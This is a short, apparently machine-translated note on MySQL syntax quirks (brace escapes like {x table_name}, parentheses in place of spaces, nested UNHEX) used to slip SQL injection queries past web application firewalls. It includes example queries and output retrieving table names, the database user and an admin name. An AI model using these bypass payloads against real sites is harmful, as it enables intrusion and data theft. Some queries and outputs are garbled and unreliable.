MySQL syntax bypass some WAF

Select {x table_name}  from {x Information_schema.tables}

Mysql> Select{x table_name} from{x Information_schema.tables};+----------------------------------------------------+|table_name|+----------------------------------------------------+|Character_sets||Collations||Collation_character_set_applicability||COLUMNS||Column_privileges||ENGINES|

Mysql> Select{x version ()} from{xUser};+---------------+|{x version ()}|+---------------+| 5.5. --Log    || 5.5. --Log    || 5.5. --Log    || 5.5. --Log    |+---------------+4Rowsinch Set(0.00Sec

Select{x a}from{x B}. B is any table name that exists for the current database. A is the content you want to return. Well, I can think of the scene is to get User (), version () and the like {} instead of a space bypass the regular detection of what? We can either select{x directly (User ())} or select (User ()).
To get other information, like this.

Mysql> Select{x (Select User  from UserLimit1)} from{xUser};+-------------------------------------+|{x (Select User  from UserLimit1)}|+-------------------------------------+|Root||Root||Root||Root

MySQL>Select{x (name)}from{x (Manager)}; + -- ------+ | | + -- ------+ | Admin  | + -- ------+ 1 inch Set (0.00 sec)

You can play it like this, remove the space

It's OK to use parentheses!

 as : Select (host)  from (MySQL. User ); SELECT (Unhex (Unhex (333532453335324533323335)));

The rules of certain WAF are matched directly with parentheses

Select {x+table_name}  from

https://twitter.com/Black2Fan/status/564746640138182656
Http://dev.mysql.com/doc/refman/5.6/en/date-and-time-literals.html#date-and-time-standard-sql-literals
http://dev.mysql.com/doc/refman/5.6/en/join.html#idm140714470997024

MySQL syntax bypass some WAF